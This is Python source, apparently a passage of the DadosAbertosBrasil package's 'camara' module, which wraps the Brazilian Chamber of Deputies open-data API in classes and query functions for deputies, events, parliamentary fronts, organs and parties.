    params = {chave: valor for chave, valor in filtros.items() if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='votacoes', params=params)
    return _df(dados, 'id' if index else None)
def referencias(
        lista: str,
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Lists of valid values for the functions of this module.

    Parameters
    ----------
    lista : str
        References to list. Must be one of the following options:
        - 'autores'
        - 'temas'
        - 'eventos'
        - 'orgaos'
        - 'proposicoes'
        - 'tramitacoes'
        - 'ufs'
        - 'situacoes_deputados'
        - 'situacoes_eventos'
        - 'situacoes_orgaos'
        - 'situacoes_proposicoes'
    index : bool (default=False)
        If True, sets the `cod` column as the DataFrame index.

    Raises
    ------
    TypeError
        If `lista` is not one of the accepted aliases.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of valid references.
    '''
    # Maps each friendly alias accepted in `lista` to its API sub-path.
    referencia = {
        'autores': 'proposicoes/codTipoAutor',
        'temas': 'proposicoes/codTema',
        'eventos': 'tiposEvento',
        'orgaos': 'tiposOrgao',
        'proposicoes': 'tiposProposicao',
        'tramitacoes': 'tiposTramitacao',
        'ufs': 'uf',
        'situacoes_deputados': 'situacoesDeputado',
        'situacoes_eventos': 'situacoesEvento',
        'situacoes_orgaos': 'situacoesOrgao',
        'situacoes_proposicoes': 'situacoesProposicao'
    }
    # Unknown alias: fail early, listing every accepted value.
    if lista in referencia.keys():
        data = _get(f'referencias/{referencia[lista]}')
    else:
        raise TypeError('Referência inválida. Insira um dos seguintes valores para `lista`: ' \
            + ', '.join(list(referencia.keys())))
    df = _pd.DataFrame(data['dados'])
    # Optionally index the table by the numeric code of each reference.
    if index:
        df.set_index('cod', inplace=True)
    return df
'''
Módulo para captura dos dados abertos da Câmara dos Deputados do Brasil.
Mini-Tutorial
-------------
1. Importe o módulo `camara`.
>>> from DadosAbertosBrasil import camara
2. Busque o código do objeto de estudo utilizando as funções `lista`.
>>> camara.lista_deputados( ... )
3. Instancie o objeto de estudo utilizando o código encontrado.
>>> dep = camara.Deputado(cod)
4. Utilize os atributos da classe para obter informações básicas do objeto.
>>> dep.dados
5. Utilize os métodos da classe para obter informações detalhadas do objeto.
>>> dep.despesas( ... )
Documentação da API original
----------------------------
https://dadosabertos.camara.leg.br/swagger/api.html
'''
import pandas as _pd
from ._utils import parse
from ._utils.get_data import get_data
def _get(
        path: str,
        params: dict = None
    ) -> dict:
    '''
    Fetch raw JSON data from the Chamber of Deputies open-data API.

    Parameters
    ----------
    path : str
        Path appended to the API root endpoint.
    params : dict (default=None)
        Query-string parameters of the request.

    Returns
    -------
    dict
        Raw payload returned by `get_data`.
    '''
    raiz = 'https://dadosabertos.camara.leg.br/api/v2/'
    return get_data(endpoint=raiz, path=path, params=params)
def _df(
        dados: dict,
        index_col: str = None
    ) -> _pd.DataFrame:
    '''
    Convert a raw API payload into a DataFrame.

    Parameters
    ----------
    dados : dict
        Raw API payload; records are read from its 'dados' key.
    index_col : str (default=None)
        Name of the column to use as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        Records converted into a DataFrame.
    '''
    frame = _pd.DataFrame(dados['dados'])
    # Indexing an empty frame would raise KeyError on the missing column.
    if index_col is None or frame.empty:
        return frame
    return frame.set_index(index_col)
class Bloco:
    '''
    Information on a specific parliamentary bloc.

    Parameters
    ----------
    cod : int
        Numeric code of the parliamentary bloc of interest.

    Attributes
    ----------
    dados : dict
        Full data set returned by the API.
    cod : int
        Numeric code of the parliamentary bloc.
    legislatura : str
        Legislature of the parliamentary bloc.
    nome : str
        Name of the parliamentary bloc.
    uri : str
        URL for direct API access to the bloc's data.

    Examples
    --------
    Get the name of bloc #576.
    >>> bl = camara.Bloco(cod=576)
    >>> bl.nome
    ... 'PSL, PTB'

    --------------------------------------------------------------------------
    '''

    def __init__(self, cod:int):
        self.cod = cod
        self.dados = _get(['blocos', str(cod)])['dados']
        # Expose the most used API fields as plain attributes.
        for atributo, campo in (
            ('legislatura', 'idLegislatura'),
            ('nome', 'nome'),
            ('uri', 'uri'),
        ):
            setattr(self, atributo, self.dados[campo])

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Bloco {self.nome}"
class Deputado:
    '''
    Cadastral data of a parliamentarian who, at any moment in history and
    for any period, has held office in the Chamber of Deputies.

    Parameters
    ----------
    cod : int
        Identification code of the parliamentarian.

    Attributes
    ----------
    dados : dict
        Full data set returned by the API.
    cod : int
        Identification code.
    condicao_eleitoral : str
        Electoral condition.
    cpf : str
        CPF number.
    descricao_status : str
        Description of the latest status.
    email : str
        E-mail address.
    escolaridade : str
        Education level.
    falecimento : str
        Date of death in the 'AAAA-MM-DD' format.
        Empty if the parliamentarian has not died.
    foto : str
        Photo URL.
    gabinete : dict
        Identification and contact information of the office.
    legislatura : int
        ID of the most recent legislature.
    municipio_nascimento : str
        Municipality of birth.
    nascimento : str
        Date of birth in the 'AAAA-MM-DD' format.
    nome : str
        Most common name.
    nome_completo : str
        Full civil name.
    nome_eleitoral : str
        Name used during the electoral campaign.
    partido : str
        Latest party.
    rede_social : list
        Social-network handles.
    sexo : str
        - 'M': male;
        - 'F': female.
    situacao : str
        Situation of the latest status.
    uf : str
        Acronym of the federative unit by which the deputy was elected.
    uf_nascimento : str
        Federative unit of birth.
    ultima_atualizacao : str
        Date and time of the latest status update.
    uri : str
        URL for direct API access to the parliamentarian's data.
    website : str
        Website.

    Examples
    --------
    Fetch the most recent party of deputy Rodrigo Maia.
    >>> cod = 74693  # Deputy code
    >>> dep = camara.Deputado(cod=cod)
    >>> dep.partido
    ... 'DEM'

    --------------------------------------------------------------------------
    '''

    def __init__(self, cod:int):
        self.cod = cod
        self.dados = _get(['deputados', str(cod)])['dados']
        self.condicao_eleitoral = self.dados['ultimoStatus']['condicaoEleitoral']
        self.cpf = self.dados['cpf']
        self.descricao_status = self.dados['ultimoStatus']['descricaoStatus']
        self.email = self.dados['ultimoStatus']['email']
        self.escolaridade = self.dados['escolaridade']
        self.falecimento = self.dados['dataFalecimento']
        self.foto = self.dados['ultimoStatus']['urlFoto']
        self.gabinete = self.dados['ultimoStatus']['gabinete']
        self.legislatura = self.dados['ultimoStatus']['idLegislatura']
        self.municipio_nascimento = self.dados['municipioNascimento']
        self.nascimento = self.dados['dataNascimento']
        self.nome = self.dados['ultimoStatus']['nome']
        self.nome_completo = self.dados['nomeCivil']
        self.nome_eleitoral = self.dados['ultimoStatus']['nomeEleitoral']
        self.partido = self.dados['ultimoStatus']['siglaPartido']
        self.rede_social = self.dados['redeSocial']
        self.sexo = self.dados['sexo']
        self.situacao = self.dados['ultimoStatus']['situacao']
        self.uf = self.dados['ultimoStatus']['siglaUf']
        self.uf_nascimento = self.dados['ufNascimento']
        self.ultima_atualizacao = self.dados['ultimoStatus']['data']
        self.uri = self.dados['uri']
        self.website = self.dados['urlWebsite']

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Deputad{'a' if self.sexo == 'F' else 'o'} {self.nome_eleitoral}"

    def despesas(
            self,
            legislatura: int = None,
            ano: int = None,
            mes: int = None,
            fornecedor: int = None,
            pagina: int = 1,
            itens: int = None,
            asc: bool = True,
            ordenar_por: str = 'ano'
        ) -> _pd.DataFrame:
        '''
        Expenses of the deputy's parliamentary activity.

        Gives access to the records of payments and reimbursements made by
        the Chamber on behalf of the deputy under the parliamentary-activity
        quota ("cota parlamentar"). Without time parameters, the service
        returns data for the six months preceding the request.

        Parameters
        ----------
        legislatura : int (default=None)
            ID of the legislature in which the expenses occurred.
        ano : int (default=None)
            Year in which the expenses occurred.
        mes : int (default=None)
            Number of the month in which the expenses occurred.
        fornecedor : int (default=None)
            CNPJ (legal entity) or CPF (natural person) of the supplier of
            the product or service (digits only).
        pagina : int (default=1)
            Page of results to fetch, starting at 1, each page holding the
            number of items defined by `itens`.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            If True, sorts records in ascending order (A to Z, 0 to 9);
            descending otherwise.
        ordenar_por : str (default='ano')
            Field used to sort the list: any field of the return, plus
            idLegislatura.

        Returns
        -------
        pandas.core.frame.DataFrame
            Expenses of the deputy's parliamentary activity.

        ----------------------------------------------------------------------
        '''
        params = {}
        if legislatura is not None:
            params['idLegislatura'] = legislatura
        if ano is not None:
            params['ano'] = ano
        if mes is not None:
            params['mes'] = mes
        if fornecedor is not None:
            params['cnpjCpfFornecedor'] = fornecedor
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        path = ['deputados', str(self.cod), 'despesas']
        dados = _get(path=path, params=params)
        return _df(dados)

    def discursos(
            self,
            legislatura: int = None,
            inicio: str = None,
            fim: str = None,
            pagina: int = 1,
            itens: int = None,
            asc: bool = True,
            ordenar_por: str = 'dataHoraInicio'
        ) -> _pd.DataFrame:
        '''
        Speeches given by the deputy in various events.

        Returns information on the deputy's speeches that were registered,
        in any event, in the Chamber's systems. When the time parameters
        are not set, speeches of the seven days preceding the request are
        returned.

        Parameters
        ----------
        legislatura : int (default=None)
            Number of the legislature the data must refer to.
        inicio : str (default=None)
            Start date of an interval, in the 'AAAA-MM-DD' format.
        fim : str (default=None)
            End date of an interval, in the 'AAAA-MM-DD' format.
        pagina : int (default=1)
            Page of results to fetch, starting at 1, each page holding the
            number of items defined by `itens`.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            If True, sorts records in ascending order (A to Z, 0 to 9);
            descending otherwise.
        ordenar_por : str (default='dataHoraInicio')
            Field of the representation used to sort the list.

        Returns
        -------
        pandas.core.frame.DataFrame
            Speeches given by the deputy in various events.

        ----------------------------------------------------------------------
        '''
        params = {}
        if legislatura is not None:
            params['idLegislatura'] = legislatura
        if inicio is not None:
            params['dataInicio'] = parse.data(inicio, 'camara')
        if fim is not None:
            params['dataFim'] = parse.data(fim, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        path = ['deputados', str(self.cod), 'discursos']
        dados = _get(path=path, params=params)
        return _df(dados)

    def eventos(
            self,
            legislatura: int = None,
            inicio: str = None,
            fim: str = None,
            pagina: int = 1,
            itens: int = None,
            asc: bool = True,
            ordenar_por: str = 'dataHoraInicio',
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Events with the participation of the parliamentarian.

        Returns a list of events in which the deputy's participation was or
        is expected. Without time parameters, events are returned for a
        five-day window: two days before and two after the request day.

        Parameters
        ----------
        legislatura : int (default=None)
            Number of the legislature the data must refer to.
        inicio : str (default=None)
            Start date of an interval, in the 'AAAA-MM-DD' format.
        fim : str (default=None)
            End date of an interval, in the 'AAAA-MM-DD' format.
        pagina : int (default=1)
            Page of results to fetch, starting at 1, each page holding the
            number of items defined by `itens`.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            If True, sorts records in ascending order (A to Z, 0 to 9);
            descending otherwise.
        ordenar_por : str (default='dataHoraInicio')
            Field of the representation used to sort the list.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Events with the participation of the parliamentarian.

        ----------------------------------------------------------------------
        '''
        params = {}
        if legislatura is not None:
            params['idLegislatura'] = legislatura
        if inicio is not None:
            params['dataInicio'] = parse.data(inicio, 'camara')
        if fim is not None:
            params['dataFim'] = parse.data(fim, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        path = ['deputados', str(self.cod), 'eventos']
        dados = _get(path=path, params=params)
        index_col = 'id' if index else None
        return _df(dados, index_col)

    def frentes(
            self,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Parliamentary fronts of which the deputy is a member.

        Returns basic information on the parliamentary fronts of which the
        deputy is a member or, for fronts of previous legislatures, ended
        the legislature as a member.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Parliamentary fronts of which the deputy is a member.

        ----------------------------------------------------------------------
        '''
        path = ['deputados', str(self.cod), 'frentes']
        dados = _get(path=path, params=None)
        index_col = 'id' if index else None
        return _df(dados, index_col)

    def orgaos(
            self,
            legislatura: int = None,
            inicio: str = None,
            fim: str = None,
            pagina: int = 1,
            itens: int = None,
            asc: bool = True,
            ordenar_por: str = 'dataInicio',
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Bodies of which the deputy is a member.

        Returns a list of bodies — such as committees and prosecution
        offices — in which the deputy participates or participated during
        an interval of time. Each item identifies a body, the position held
        by the deputy in it (president, vice-president, member or
        substitute) and the start/end dates of that position.

        Without time parameters, the bodies occupied at the moment of the
        request are returned; in that case, the list is empty if the deputy
        is not in office.

        Parameters
        ----------
        legislatura : int (default=None)
            Number of the legislature the data must refer to.
        inicio : str (default=None)
            Start date of an interval, in the 'AAAA-MM-DD' format.
        fim : str (default=None)
            End date of an interval, in the 'AAAA-MM-DD' format.
        pagina : int (default=1)
            Page of results to fetch, starting at 1, each page holding the
            number of items defined by `itens`.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            If True, sorts records in ascending order (A to Z, 0 to 9);
            descending otherwise.
        ordenar_por : str (default='dataInicio')
            Field of the representation used to sort the list.
        index : bool (default=False)
            If True, sets the `idOrgao` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Bodies of which the deputy is a member.

        ----------------------------------------------------------------------
        '''
        params = {}
        # Bug fix: `legislatura` used to be accepted but silently ignored.
        # Forward it like the sibling methods (despesas/discursos/eventos) do.
        if legislatura is not None:
            params['idLegislatura'] = legislatura
        if inicio is not None:
            params['dataInicio'] = parse.data(inicio, 'camara')
        if fim is not None:
            params['dataFim'] = parse.data(fim, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        path = ['deputados', str(self.cod), 'orgaos']
        dados = _get(path=path, params=params)
        index_col = 'idOrgao' if index else None
        return _df(dados, index_col)
class Evento:
    '''
    Detailed information about an event of the Chamber of Deputies.

    Parameters
    ----------
    cod : int
        Numeric code of the event.

    Attributes
    ----------
    dados : dict
        Complete data set returned by the API.
    cod : int
        Numeric code of the event.
    andar : str
        Floor of the building where the event took place.
    descricao : str
        Description of the event.
    descricao_tipo : str
        Type of the event.
    fases : str
        Phases of the event.
    fim : str
        Date and time the event ended ('AAAA-MM-DD').
    inicio : str
        Date and time the event started ('AAAA-MM-DD').
    local : str
        Place inside the Chamber where the event took place.
    local_externo : str
        External location of the event, if any.
    lista_orgaos : list of dict
        Organs related to the event.
    predio : str
        Building where the event took place.
    requerimentos : list of dict
        Requirements of the event.
    sala : str
        Room where the event took place.
    situacao : str
        Status of the event.
    uri : str
        API endpoint with the raw data of the event.
    uri_convidados : str
        API endpoint with the raw data of the guests.
    uri_deputados : str
        API endpoint with the raw data of the deputies.
    url_documento_pauta : str
        URL of the event's agenda document.
    url_registro : str
        URL where the event was recorded.

    Examples
    --------
    Get the URL to watch event #59265.
    >>> ev = camara.Evento(cod=59265)
    >>> ev.url_registro
    ... 'https://www.youtube.com/watch?v=8D2gjMrTnMA'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['eventos', str(cod)])['dados']
        # The nested 'localCamara' record holds the physical location.
        local_camara = self.dados['localCamara']
        self.andar = local_camara['andar']
        self.descricao = self.dados['descricao']
        self.descricao_tipo = self.dados['descricaoTipo']
        self.fases = self.dados['fases']
        self.fim = self.dados['dataHoraFim']
        self.inicio = self.dados['dataHoraInicio']
        self.local = local_camara['nome']
        self.local_externo = self.dados['localExterno']
        self.lista_orgaos = self.dados['orgaos']
        self.predio = local_camara['predio']
        self.requerimentos = self.dados['requerimentos']
        self.sala = local_camara['sala']
        self.situacao = self.dados['situacao']
        self.uri = self.dados['uri']
        self.uri_convidados = self.dados['uriConvidados']
        self.uri_deputados = self.dados['uriDeputados']
        self.url_documento_pauta = self.dados['urlDocumentoPauta']
        self.url_registro = self.dados['urlRegistro']

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Evento {self.descricao}"

    def deputados(self, index: bool = False) -> _pd.DataFrame:
        '''
        Deputies taking part in the event.

        For past events, lists the deputies who actually registered
        attendance; for future events, those expected to attend, either
        as guests or as members of the organ(s) in charge.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Summary data of the participating deputies.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['eventos', str(self.cod), 'deputados'], params=None)
        return _df(dados, 'id' if index else None)

    def orgaos(self, index: bool = False) -> _pd.DataFrame:
        '''
        Organs responsible for the event.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Minimal data about the organizing organ(s).
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['eventos', str(self.cod), 'orgaos'], params=None)
        return _df(dados, 'id' if index else None)

    def pauta(self, index: bool = False) -> _pd.DataFrame:
        '''
        Propositions evaluated (or to be evaluated) in a deliberative event.

        Each item identifies, where available, the proposition under
        evaluation, its preference regime, the rapporteur and opinion,
        and the outcome of the vote.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `ordem` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Agenda of the event.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['eventos', str(self.cod), 'pauta'], params=None)
        return _df(dados, 'ordem' if index else None)

    def votacoes(self, index: bool = False) -> _pd.DataFrame:
        '''
        Basic data about votes held during the event.

        Votes only occur in deliberative events; complementary data on
        each listed vote can be obtained via `camara.Votacao`.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Votes held during the event.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['eventos', str(self.cod), 'votacoes'], params=None)
        return _df(dados, 'id' if index else None)
class Frente:
    '''
    Detailed information about a parliamentary front.

    Parameters
    ----------
    cod : int
        Numeric code of the parliamentary front.

    Attributes
    ----------
    dados : dict
        Complete data set returned by the API.
    cod : int
        Numeric code of the parliamentary front.
    coordenador : dict
        Data about the coordinator of the front.
    documento : str
        URL of the front's document.
    email : str
        Contact e-mail.
    id_sitacao : int
        ID of the front's status.
    keywords : str
        Keywords of the front.
    legislatura : int
        ID of the legislature of the front.
    situacao : str
        Status of the front.
    telefone : str
        Contact phone number.
    titulo : str
        Title of the front.
    uri : str
        API endpoint with the raw data of the front.
    website : str
        URL of the front's website.

    Examples
    --------
    Get the title of parliamentary front #54258.
    >>> fr = camara.Frente(cod=54258)
    >>> fr.titulo
    ... 'Frente Parlamentar Mista da Telessaúde'
    --------------------------------------------------------------------------
    '''

    # Maps each attribute name to the corresponding key in the API payload.
    _CAMPOS = {
        'coordenador': 'coordenador',
        'documento': 'urlDocumento',
        'email': 'email',
        'id_sitacao': 'idSituacao',
        'keywords': 'keywords',
        'legislatura': 'idLegislatura',
        'situacao': 'situacao',
        'telefone': 'telefone',
        'titulo': 'titulo',
        'uri': 'uri',
        'website': 'urlWebsite',
    }

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['frentes', str(cod)])['dados']
        for atributo, chave in self._CAMPOS.items():
            setattr(self, atributo, self.dados[chave])

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: {self.titulo}"

    def membros(self, index: bool = False) -> _pd.DataFrame:
        '''
        Deputies who take part in the parliamentary front.

        Lists the participating deputies and the roles they held in the
        front (signatory, coordinator or president). Even for mixed fronts
        (deputies and senators), only data about deputies is returned.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Members of the parliamentary front.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['frentes', str(self.cod), 'membros'], params=None)
        return _df(dados, 'id' if index else None)
class Legislatura:
    '''
    Extra information about a given legislature of the Chamber.

    Parameters
    ----------
    cod : int
        Numeric code of the legislature.

    Attributes
    ----------
    dados : dict
        Complete data set returned by the API.
    cod : int
        Numeric code of the legislature.
    inicio : str
        First day of the legislature.
    fim : str
        Last day of the legislature.
    uri : str
        API endpoint with the raw data of the legislature.

    Examples
    --------
    Get the first and last day of legislature #54.
    >>> leg = camara.Legislatura(cod=54)
    >>> leg.inicio
    ... '2011-02-01'
    >>> leg.fim
    ... '2015-01-31'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['legislaturas', str(cod)])['dados']
        self.fim = self.dados['dataFim']
        self.inicio = self.dados['dataInicio']
        self.uri = self.dados['uri']

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Legislatura {self.cod}"

    def mesa(
            self,
            inicio: str = None,
            fim: str = None,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Deputies who sat on the Board (Mesa Diretora) during the legislature.

        Each legislature normally has two Boards, each with a president,
        two vice-presidents, four secretaries and their substitutes.

        Parameters
        ----------
        inicio : str (default=None)
            Start of the time interval, 'AAAA-MM-DD' format.
        fim : str (default=None)
            End of the time interval, 'AAAA-MM-DD' format.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Basic data on every deputy who held a Board position.
        ----------------------------------------------------------------------
        '''
        # Only forward the date filters the caller actually provided.
        params = {
            chave: parse.data(valor, 'camara')
            for chave, valor in (('dataInicio', inicio), ('dataFim', fim))
            if valor is not None
        }
        dados = _get(path=['legislaturas', str(self.cod), 'mesa'], params=params)
        return _df(dados, 'id' if index else None)
class Orgao:
    '''
    Detailed information about an organ of the Chamber.

    Parameters
    ----------
    cod : int
        Numeric code of the organ.

    Attributes
    ----------
    dados : dict
        Complete data set returned by the API.
    cod : int
        Numeric code of the organ.
    apelido : str
        Nickname of the organ.
    casa : str
        House of the organ.
    cod_tipo : int
        Numeric code of the organ type.
    fim : str
        End date of the organ.
    inicio : str
        Start date of the organ.
    instalacao : str
        Installation date of the organ.
    nome : str
        Name of the organ.
    nome_publicacao : str
        Publication name.
    sala : str
        Room of the organ.
    sigla : str
        Acronym of the organ.
    tipo : str
        Type of the organ.
    uri : str
        API endpoint with the raw data of the organ.
    urlWebsite : str
        URL of the organ's website.

    Examples
    --------
    Get the nickname of organ #4.
    >>> org = camara.Orgao(cod=4)
    >>> org.apelido
    ... 'Mesa Diretora'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['orgaos', str(cod)])['dados']
        # (attribute, API key) pairs, read in payload order.
        pares = (
            ('apelido', 'apelido'),
            ('casa', 'casa'),
            ('cod_tipo', 'codTipoOrgao'),
            ('fim', 'dataFim'),
            ('inicio', 'dataInicio'),
            ('instalacao', 'dataInstalacao'),
            ('nome', 'nome'),
            ('nome_publicacao', 'nomePublicacao'),
            ('sala', 'sala'),
            ('sigla', 'sigla'),
            ('tipo', 'tipoOrgao'),
            ('uri', 'uri'),
            ('urlWebsite', 'urlWebsite'),
        )
        for atributo, chave in pares:
            setattr(self, atributo, self.dados[chave])

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Órgão {self.nome}"

    def eventos(
            self,
            tipo_evento: str = None,
            inicio: str = None,
            fim: str = None,
            pagina: int = 1,
            itens: int = None,
            asc: bool = True,
            ordenar_por: str = 'dataHoraInicio',
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Events that happened or are scheduled in the legislative organ.

        By default returns events in progress or scheduled from two days
        before to two days after the request; the parameters below change
        that window and filter by event type.

        Parameters
        ----------
        tipo_evento : str (default=None)
            Numeric identifier of the desired event type.
        inicio : str (default=None)
            Start of the time interval, 'AAAA-MM-DD' format.
        fim : str (default=None)
            End of the time interval, 'AAAA-MM-DD' format.
        pagina : int (default=1)
            Results page number, starting from 1.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            Ascending (True) or descending (False) ordering.
        ordenar_por : str (default='dataHoraInicio')
            Field used to sort the list.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Summary of the organ's events.
        ----------------------------------------------------------------------
        '''
        params = {}
        if tipo_evento is not None:
            params['idTipoEvento'] = tipo_evento
        for chave, valor in (('dataInicio', inicio), ('dataFim', fim)):
            if valor is not None:
                params[chave] = parse.data(valor, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        dados = _get(path=['orgaos', str(self.cod), 'eventos'], params=params)
        return _df(dados, 'id' if index else None)

    def membros(
            self,
            inicio: str = None,
            fim: str = None,
            pagina: int = 1,
            itens: int = None,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Positions of the organ and the parliamentarians who hold them.

        Without time parameters, returns the members at the moment of the
        request; an empty list is returned if the organ no longer exists
        or is not installed.

        Parameters
        ----------
        inicio : str (default=None)
            Start of the time interval, 'AAAA-MM-DD' format.
        fim : str (default=None)
            End of the time interval, 'AAAA-MM-DD' format.
        pagina : int (default=1)
            Results page number, starting from 1.
        itens : int (default=None)
            Maximum number of items per page.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Positions of the organ and their occupants.
        ----------------------------------------------------------------------
        '''
        params = {}
        for chave, valor in (('dataInicio', inicio), ('dataFim', fim)):
            if valor is not None:
                params[chave] = parse.data(valor, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        dados = _get(path=['orgaos', str(self.cod), 'membros'], params=params)
        return _df(dados, 'id' if index else None)

    def votacoes(
            self,
            proposicao: int = None,
            inicio: str = None,
            fim: str = None,
            pagina: int = 1,
            itens: int = None,
            asc: bool = False,
            ordenar_por: str = 'dataHoraRegistro',
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Basic data about votes held in events of this organ.

        For permanent organs of the Chamber, the default window is the
        last 30 days; `inicio`/`fim` change it, but are currently limited
        to votes within a single year. For temporary organs (e.g. special
        committees), all votes are listed by default. Complementary data
        on each vote can be obtained via `camara.Votacao`.

        Parameters
        ----------
        proposicao : int (default=None)
            Numeric code of a proposition (see `camara.lista_proposicoes`);
            if present, lists only votes that had it as object or that
            affected it.
        inicio : str (default=None)
            Start of the time interval, 'AAAA-MM-DD' format.
        fim : str (default=None)
            End of the time interval, 'AAAA-MM-DD' format.
        pagina : int (default=1)
            Results page number, starting from 1.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=False)
            Ascending (True) or descending (False) ordering.
        ordenar_por : str (default='dataHoraRegistro')
            Field used to sort the list.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Votes held in the organ.
        ----------------------------------------------------------------------
        '''
        params = {}
        if proposicao is not None:
            params['idProposicao'] = proposicao
        for chave, valor in (('dataInicio', inicio), ('dataFim', fim)):
            if valor is not None:
                params[chave] = parse.data(valor, 'camara')
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        params['ordenarPor'] = ordenar_por
        dados = _get(path=['orgaos', str(self.cod), 'votacoes'], params=params)
        return _df(dados, 'id' if index else None)
class Partido:
    '''
    Detailed information about a political party.

    Parameters
    ----------
    cod : int
        Numeric code of the party.

    Attributes
    ----------
    dados : dict
        Complete data set returned by the API.
    cod : int
        Numeric code of the party.
    facebook : str
        URL of the party's Facebook page.
    legislatura : str
        Numeric code of the latest legislature.
    lider : dict
        Data about the party leader.
    logo : str
        URL of the party logo.
    nome : str
        Full name of the party.
    numero : int
        Electoral number of the party.
    sigla : str
        Acronym of the party.
    situacao : str
        Status of the party.
    total_membros : str
        Total number of members.
    total_posse : str
        Total number of members who took office.
    ultima_atualizacao : str
        Timestamp of the last update of the party data.
    uri : str
        API endpoint with the raw data of the party.
    uri_membros : str
        API endpoint with the raw data of the party members.
    website : str
        URL of the party's website.

    Examples
    --------
    Get the full name of party #36899.
    >>> p = camara.Partido(cod=36899)
    >>> p.nome
    ... 'Movimento Democrático Brasileiro'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['partidos', str(cod)])['dados']
        # The nested 'status' record holds the current situation data.
        status = self.dados['status']
        self.facebook = self.dados['urlFacebook']
        self.legislatura = status['idLegislatura']
        self.lider = status['lider']
        self.logo = self.dados['urlLogo']
        self.nome = self.dados['nome']
        self.numero = self.dados['numeroEleitoral']
        self.sigla = self.dados['sigla']
        self.situacao = status['situacao']
        self.total_membros = status['totalMembros']
        self.total_posse = status['totalPosse']
        self.ultima_atualizacao = status['data']
        self.uri = self.dados['uri']
        self.uri_membros = status['uriMembros']
        self.website = self.dados['urlWebSite']

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: {self.nome}"

    def membros(
            self,
            inicio: str = None,
            fim: str = None,
            legislatura: int = None,
            pagina: int = 1,
            itens: int = None,
            ordenar_por: str = None,
            asc: bool = True,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Parliamentarians of the party during a period.

        Lists deputies who are or were in office for the party. Use
        `inicio`, `fim` or `legislatura` to restrict the period. This is
        equivalent to `lista_deputados` filtered by party, but better
        suited to obtaining members of extinct parties.

        Parameters
        ----------
        inicio : str (default=None)
